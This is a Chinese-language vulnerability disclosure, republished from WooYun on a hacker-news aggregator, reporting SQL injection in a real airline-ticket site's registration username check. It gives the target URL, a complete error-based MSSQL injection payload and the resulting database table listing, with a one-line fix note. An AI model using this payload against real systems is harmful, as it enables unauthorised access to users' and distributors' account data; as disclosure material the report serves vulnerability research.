记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

易购网存在高危安全漏洞可导致所有用户信息与全部分销商账号泄漏(影响机票信息安全)

2015-05-15 16:05

易购网在用户注册的时候程序会自动判断下用户名是否重复

1.png



很可惜,还未登录用户系统就已经存在安全漏洞了,这个地方存在SQL注射漏洞。

code 区域
http://rtpnr.com/NewEdition/YeeGoMember/RegisterNewCustomer.aspx

POST:

Type=IsExsitValue&ValidateType=loginid&ValidateValue=admin' AND 1794=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1794=1794) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'GIYn'='GIYn





code 区域
Database: YeeGoUser

[39 tables]

+---------------------------------+

| SC_Permission |

| SC_Role |

| SC_Role_Permission |

| SC_User |

| SC_UserBasicData |

| SC_UserLogin |

| SC_UserPermission |

| S_CusInfo |

| S_CusInfo_ContactPerson |

| S_CusInfo_SalesManager |

| T_Application_Platform |

| T_CustomerFlag_logs |

| T_CustomerID |

| T_Customer_Application |

| T_Customer_Application_Account |

| T_PDActive |

| T_PDActiveBak |

| T_WorkOrder |

| T_WorkOrderRemark |

| T_WorkOrderType |

| T_WorkOrder_ContactPurpose |

| T_WorkOrder_ContactType |

| T_WorkOrder_CustomQuestion |

| T_WorkOrder_PlatformApplication |

| T_WorkOrder_QuestionType |

| VW_CW_CusWorkOrder_YeeGo |

| VW_PDAction |

| VW_SC_UserLogin_YeeGo |

| VW_YeeGo_UserLogin |

| V_CusApplyInfo |

| V_CustomerAccount |

| V_CustomerInfo |

| V_CustomerInfo_ExportCustomer |

| V_CustomerInfo_ExportUser |

| V_CustomerUserInfo |

| V_Customer_PlatformInfo |

| V_User_Permission |

| V_WorkOrder |

| V_WorkOrder_ContactType |

+---------------------------------+

漏洞证明:

然后基本主站所有的数据库都变成可读的了。

yeego.png



yeego2.png



yeego3.png



yee.png

修复方案:

SQL注射而已

知识来源: www.wooyun.org/bugs/wooyun-2015-0103915

阅读:91355 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“易购网存在高危安全漏洞可导致所有用户信息与全部分销商账号泄漏(影响机票信息安全)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云